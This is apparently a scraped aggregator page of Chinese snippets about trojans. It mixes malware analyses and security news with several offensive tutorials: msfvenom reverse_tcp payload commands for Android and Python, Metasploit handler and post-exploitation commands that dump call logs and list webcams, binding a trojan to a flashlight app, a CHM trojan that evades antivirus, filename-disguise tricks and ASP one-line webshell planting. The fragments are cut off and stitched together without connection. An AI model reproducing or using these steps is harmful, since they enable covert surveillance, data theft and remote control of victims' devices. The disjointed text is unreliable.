作者丨黑蛋一、木马简述文件名称9dfd124ca235aa3d8434afbb0167581ff2f35ad0ab142ee5bdff0ff29b64d542文件类型(Magic)PE32 executable...操作系统win7x86三、行为分析打开火绒剑,打开监视,然后打开木马:运行一会,木马本体就消失了。...这就是这个木马的主要功能。
偶然获得了一个过X60启动的CHM木马,由于从未接触过此类木马,遂进行一番学习,并通过木马所带来的启发再创造。 ?...一、木马行为分析 CHM文件是经过压缩的各类资源的集合,使用7z解压软件直接打开木马样本,如图所示,可以发现CHM文件内部包含一个说明.html文件。 ?...CHM木马的执行流程: 1.利用WINRAR解压自身到C:\Users\Public\Documents 2.执行CMD命令注册1.reg 添加启动 3.打开Perflog.exe 在WIN7虚拟机打开样本可以看到解压出了如下文件...5.将压缩包并写入CHM(利用C32Asm) ? 将payload.rar粘贴到CHM的最后面并保存 ? 6.测试 ? OK,成功。...三、小结 之所以这个方法能绕过杀毒检测我感觉可能是因为利用CHM文件可以绕过父进程检测 PS:我WIN7 32位虚拟机测试是可以过检测的,不知道别的环境是否可以,如果不行别喷我呀 另外此方法不用网络下载也很出彩
背景介绍 银行木马与每个人的日常生活息息相关,可能会对每个人造成直接的经济损失。 思科的研究团队Talos近日发现一起针对对南美巴西的银行木马活动。...令人意外的是,该木马使用了多重反逆向分析技术,而且最终的payload是用Delphi编写的,而Delphi在银行木马中并不常见。...感染传播Infection Vector 垃圾邮件 与大多数银行木马活动类似,该木马首先利用恶意垃圾邮件进行传播。...银行木马 该木马的主要模块含有一系列的特征。...结论 银行木马也是安全威胁的一部分,而且在不断发展。
利用DNS劫持内网准备钓鱼网页诱导下载安装安卓木马 ---- 前言 内网渗透,非公网IP上线。 不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏 互联网非法外之地,还请各位兄弟谨记,且行且珍惜。...第一步 生成安卓木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk...使用木马窃取信息 现在我们先使用木马窃取对方通话记录 在终端输入dump_calllog 此时返回的数据应该是 meterpreter > dump_calllog [*] Fetching 243 entries...saved to calllog_dump_20191126214943.txt meterpreter > 然后我们去root目录下能看到抓取到的通话记录打开后 image.png 接下来利用木马进行拍照...获取目标手机的摄像头数量 meterpreter > webcam_list 1: Back Camera 2: Front Camera meterpreter > 返回给我们两个摄像头 一个前置一个后置 我们利用
给生成的木马起个名字 确定 下一步 ? 这里选择 apache2这个 然后监听已经运行起来了。 ? 我们用苹果手机访问kali的地址192.168.124.11 ? 这里生成的是.macho文件。...理论上生成的ios包exe 也会都免杀,具体怎么利用这个呢!
(成功安装木马文件) 4 使用metasploit控制台对模拟器进行攻击: 4.1 启动metasploit: ?...(系统命令执行和摄像头操作) 6 远控升级之捆绑app: 说明:现实生活中没有人会傻乎乎的下载个木马apk文件呀,所以我们的通过一些伪装的办法,将apk木马文件捆绑在用户常用的App上,诱导用户下载使用...6.8 Shoudiantong.apk木马文件测试,将手电筒apk文件装在手机上: ? 6.9 打开并正常使用完全没问题: ? 7 进行手机攻击 7.1 查看手机与攻击机建立的联系 ?...8 总结: 通过对手机木马文件对手机的植入,我们可以成功的对手机进行控制,其中包括对手机使用者进行录音、拍照、查看下载手机私密文件,获取手机网络信息,进程信息等。实现对手机的完全控制。...本文简单介绍如何将木马文件绑定到正常app实现对受害者攻击,其实还有很多办法,如通过中间人、钓鱼实现木马植入等。
📷 源代码如下 这里主要是使用css动画属性和3d旋转 <!DOCTYPE html> <html lang="en"> <head> <meta c...
继上次发表 记一次线下赛靶机攻击过程 后,看到反响不错,特此再写一篇,关于一台 ASP 靶机漏洞利用过程。...看到有首页 JS 生成模块,其中有生成 asp 文件类型选项,个人觉得有可利用价值,但个人没使用过,怕乱点破坏环境,导致网站无法访问,故没有深入操作。 ?...接下来就利用 eweb 漏洞来上传 webshell,至于怎么上传,这边就不提及了,虽然本文比较照顾小白,但照顾的是思路,对于这种“烂大街”的漏洞就不细说了。...之前我们发现靶机把 .mdb 加固成了 .asp,理论上防止了被下载,但是忽略掉了如果把 asp 一句话写入进了数据库,保存在数据库文件内,那也就是 asp 文件,那么这个数据库 asp 文件就变成了一句话的木马文件了...尝试把一句话木马写入数据库 ? 内容进入,接下来需要做的就是找到该数据库文件 ?
近日,NCC集团安全专家Stephen Tomkinson在播放蓝光光盘的软件上发现了两个漏洞,利用这些漏洞可以将木马植入到使用受影响设备的电脑上。...Tomkinson制作了一个蓝光光盘,利用此光盘可以检测光盘播放器的类型,使用其中的一个漏洞利用代码可以为主机上的木马提供恶意服务。...正是这个原因,使得别有用心的人可以利用这一点绕过Windows系统的安全控制。...第二个漏洞会影响一些蓝光光盘播放器的硬件,这种攻击需要依靠由黑客Malcolm Stagg开发的一个利用代码,该代码利用了从外部USB设备中启动调试代码的特点,使得攻击者有机会获取到蓝光光盘播放器的root...针对Tomkinson的攻击,研究人员也提出了一些改进措施,例如,可以利用相应技术来识别系统主机,然后执行对应该主机特点的利用代码,以隐藏该恶意活动,或者可以让蓝光光盘先执行恶意代码,然后再播放光盘中的正常内容
Kworker 木马,如果发现root 权限计划任务有以下这种非常规任务,说明已经中招成了矿机 Dt 环境,大家要注意,切莫随便给开放端口。
近日,趋势科技发现挖矿木马 z0Miner 一直在利用 Atlassian 的 Confluence 远程代码执行漏洞(CVE-2021-26084)。...去年年底,z0Miner 被发现利用 Oracle 的 WebLogic 远程代码执行漏洞(CVE-2020-14882)发起攻击。...从那以后,z0Miner 被发现多次利用各种 RCE 漏洞发起攻击,例如 CVE-2015-1427。 感染链 根据调查,利用 CVE-2021-26084 漏洞的感染链与此前类似。...一旦 Confluence 漏洞被成功利用,z0Miner 就会部署 WebShell 下载恶意软件。
准备工作: test.exe 利用msfvenom提前生成的后门 index.jpg 一张图片 Resource_Hacker 给后门穿个马夹 Unitrix 实现完美转身 1、index.jpg转换为...2、利用Resource_Hacker给后门穿件马夹 打开Resource_Hacker,通过file—>open导入我们提前生成的后门test.exe ?...3、 利用Unitrix实现完美变身 最开始我还以为Unitrix是个小工具,通过查资料才发现,原来Unitrix是一个病毒名称,此病毒就是利用在文件名中插入unicode字符,来实现文件名以相反顺序显示...最后:伪装的木马虽然骗的了我们的眼睛,但是骗不过杀毒软件,只有免杀的木马穿上这件马夹才能碰撞出更激情的火花,实现华丽转身。
一、 背景介绍 驱动人生木马在1月24日的基础上再次更新,将攻击组件安装为计划任务、服务并启动。本次手工查杀主要针对该木马。...相关文章:https://www.freebuf.com/column/195250.html 最近在应急过程中,某单位电脑感染了更新后的驱动人生木马,由于客观原因,不能安装杀毒软件进行查杀,便进行手工杀毒...运行处的内容为: C:\WINDOWS\system32\cmd.exe/c C:\WINDOWS\system32\wmiex.exe 根据介绍该木马病毒的技术文章,Wmiex.exe为异常应用程序。...利用Process explorer查看: ? 关闭进程后,成功删除: ? 此时主机仍有大量外连行为, ? 查看计划任务又出现了, ?
(2)服务器端 服务器端程序 服务器端程序即木马程序,它隐藏安装在目标主机上,目标主机也称为肉鸡。 二、制作简易木马 此处我们利用msfvenom制作木马程序。...-p python/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.py 利用msfvenom制作木马时...木马免杀: 攻击者可以对木马程序进行一些免杀操作,从而绕过一些防护软件。 常用到的免杀方法有:编码加密、加壳(压缩算法)、利用一些工具进行免杀等。...在利用msfvenom制作木马时,可以使用-e x86/shikata_ganai参数进行加密。...1.木马的传播途径 (1)利用下载进行传播 (2)利用系统漏洞传播 (3)利用邮件传播 (4)利用即使通信传播 (5)利用网页传播 (6)利用蠕虫病毒传播等 2.木马的防范与查杀 (1)首先安装杀毒软件
火绒工程师远程查看后,在用户电脑中发现一组暗刷木马造成上述现象。经溯源发现是来自一款名为“舟大师”的程序携带点击器木马,目前火绒已对该其进行拦截查杀。 ?...上述行为均在用户完全不知的情况下完成,符合安全厂商对点“点击器木马(TrojanClicker)”的定义。具体分析请见文章后附的【分析报告】。...安装包文件信息 经过分析,我们发现MasterZ为点击器木马,该木马会创建隐藏IE窗体,通过云控下发的配置数据在搜索引擎中搜索关键字,以提升指定网址链接的搜索引擎排名,并爬取网页快照回传至C&C服务器...该木马还可以根据云控配置执行注册启动项、上传日志、上传页面快照、上传指定目录等操作。相关恶意行为执行流程,如下图所示: ? 恶意行为执行流程 开机自启后,该木马会自动执行点击任务。...舟大师官网 刷高搜索引擎排名 该木马会根据C&C服务器返回的云控配置,刷高指定网址链接的搜索引擎排名。
其实这不算什么高深的技术,只要在ASP.NET中利用JQuery结合一般处理程序ASHX即可搞定了。 首先我们新建一个网站,在网站里面新增一般处理程序,命名为ReadData.ashx。
ASP木马程序控制整个网站服务器。...将“一句话木马”客户端中的提交地址改为留言本数据库文件地址,然后用浏览器打开客户端,在上方的输入框中输入上传ASP木马的保存路径,在下面的输入框中可以粘贴入其它的ASP木马代码,这里选择的是桂林老兵网站管理助手...实例三 “一句话木马”入侵未知网站 从上面的两个例子,我们可以看出利用“一句话木马”入侵控制存在数据库过滤不严漏洞的网站,成功的前提是一定要知道网站的数据库地址。...这就要结合暴库或者跨站之类的方法了,下面只是结合一个简单的暴库,介绍一下利用一句话木马入侵未知网站的方法。 Step1 暴库得到数据库路径 以“http://bbs.dwself.com”为例。...%23).asp” Step2 注册网站,插入“一句话木马” 由于数据库文件是ASP文件格式的,满足入侵条件,因此现在我们需要将“一句话木马”插入到数据库文件中去。
安卓木马后门:msfvenom -p Android/Meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk win的木马后门就是...启动 msfconsole 设置use Exploit/multi/handler set payload android/meterpreter/reverse_tcp show options 木马触发地址
步骤分析 近日,国外安全厂商McAfee和FireEye发现了一个针对银行的木马,该木马利用了一个Office零日漏洞发起攻击,危害性非常高,经过安恒研究院分析步骤如下: 1....网银木马分析 sage50.exe为网银木马Dridex,可被安恒APT产品直接检测: ?...防护建议 针对此类攻击通常基于签名的检测方式很难识别,通过APT的恶意文件沙箱分析技术,可定位利用文件进行攻击的攻击进行,包括各种0day的攻击。
免责声明:本公众号安全类、工具类文章仅用于安全学习、安全研究、技术交流,内容来源于互联网已公开内容,若读者利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由读者本人负责,文章作者不承担任何责任...最近看了freebuf上关于Metasploit的一些文章,再加上最近所学习到的Kali知识,尝试利用Frp搭建公网Metasploit并使用Shellter实现简单木马免杀的渗透攻击 简单的拓扑图如下...Metasploit的设计初衷是打造成一个攻击工具开发平台, 然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境 3、Frp:一款国产优秀的内网穿透工具...(图片可放大查看) 5、靶机上线后进行渗透攻击 比如社工手段将木马程序传到靶机,一但靶机运行了该木马程序 msfconsole反弹shell就可以看到靶机上线,接下来就可以进行攻击渗透,控制靶机了 为了演示方便...(图片可放大查看) 6、安装后门 1)、将木马切换到一个比较稳定的进程,防止捆绑软件关闭后木马随之关闭 run post/windows/manage/migrate 2)、安装后门 run persistence
领取专属 10元无门槛券
手把手带您无忧上云